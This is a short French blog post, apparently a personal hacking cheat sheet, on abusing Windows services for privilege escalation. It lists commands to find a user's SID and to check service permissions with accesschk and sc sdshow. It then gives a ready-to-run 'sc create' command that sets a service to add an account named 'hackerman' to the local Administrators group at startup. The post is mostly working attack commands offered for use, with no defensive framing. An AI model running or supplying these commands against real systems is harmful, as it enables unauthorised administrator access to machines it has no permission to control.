Windows Service Abuse

1. Afficher les autorisations des utilisateurs/groupes qui peuvent accéder à ce service.

wmic useraccount where name='username' get sid  

cela vous donnera votre sid.

accesschk.exe -uwcqv "Username" * /accepteula

Vous verrez si le service est potentiellement vulnérable.

sc sdshow 

Vous verrez les permissions de ce service.

2. Créer un service pour executer des commandes

sc create MyService displayName= "MyService" binPath= "C:\Windows\System32\net.exe localgroup Administrators hackerman /add" start= auto

Laisser un commentaire

Entrez vos coordonnées ci-dessous ou cliquez sur une icône pour vous connecter:

Logo WordPress.com

Vous commentez à l’aide de votre compte WordPress.com. Déconnexion /  Changer )

Photo Google

Vous commentez à l’aide de votre compte Google. Déconnexion /  Changer )

Image Twitter

Vous commentez à l’aide de votre compte Twitter. Déconnexion /  Changer )

Photo Facebook

Vous commentez à l’aide de votre compte Facebook. Déconnexion /  Changer )

Connexion à %s